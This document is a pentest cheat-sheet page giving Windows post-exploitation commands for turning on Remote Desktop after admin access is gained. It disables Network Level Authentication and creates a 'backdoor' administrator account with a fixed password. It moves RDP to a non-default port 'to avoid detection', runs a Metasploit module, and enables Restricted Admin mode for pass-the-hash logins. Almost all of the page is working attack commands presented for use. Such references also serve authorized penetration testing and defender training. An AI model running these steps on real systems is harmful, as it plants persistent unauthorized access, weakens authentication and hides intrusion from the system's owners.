Enable RDP - BookJMP

Overview

After gaining admin access, enabling RDP provides a stable GUI session — useful for manual enumeration, credential harvesting through GUI apps, and persistent re-entry without relying on reverse shells.

Enable via Registry

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Network Level Authentication (allows connection without NLA):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Enable via PowerShell

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

One-liner:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Firewall Rules

Allow RDP through Windows Firewall (cmd):

netsh advfirewall firewall set rule group="remote desktop" new enable=yes

Or add rule manually:

netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow

Add User to Remote Desktop Users

net localgroup "Remote Desktop Users" USERNAME /add

Create new user and add to RDP group:

net user backdoor Password123! /add
net localgroup "Remote Desktop Users" backdoor /add
net localgroup "Administrators" backdoor /add

Change RDP Port

Useful to avoid detection on default port 3389:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 44300 /f

Update firewall for new port:

netsh advfirewall firewall add rule name="RDP-44300" protocol=TCP dir=in localport=44300 action=allow

Restart RDP service:

net stop TermService /y && net start TermService

Connect

From Linux:

xfreerdp /v:TARGET_IP /u:USERNAME /p:PASSWORD /cert:ignore +clipboard /dynamic-resolution

With custom port:

xfreerdp /v:TARGET_IP:44300 /u:USERNAME /p:PASSWORD /cert:ignore

From Windows:

mstsc /v:TARGET_IP

Enable via Metasploit

msf6 > use post/windows/manage/enable_rdp
msf6 post(enable_rdp) > set SESSION 1
msf6 post(enable_rdp) > set USERNAME backdoor
msf6 post(enable_rdp) > set PASSWORD Password123!
msf6 post(enable_rdp) > run

Restricted Admin Mode

Allows Pass-the-Hash over RDP (no plaintext password needed): Enable on target:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Connect with hash:

xfreerdp /v:TARGET_IP /u:Administrator /pth:NTLM_HASH /cert:ignore

Quick Reference

Method	Command	Requires
Registry	`reg add ... fDenyTSConnections`	Admin
PowerShell	`Set-ItemProperty` + `Enable-NetFirewallRule`	Admin
Metasploit	`post/windows/manage/enable_rdp`	Meterpreter session
Restricted Admin	`DisableRestrictedAdmin` + `xfreerdp /pth:`	Admin + NTLM hash

​Overview

​Enable via Registry

​Enable via PowerShell

​Firewall Rules

​Add User to Remote Desktop Users

​Change RDP Port

​Connect

​Enable via Metasploit

​Restricted Admin Mode

​Quick Reference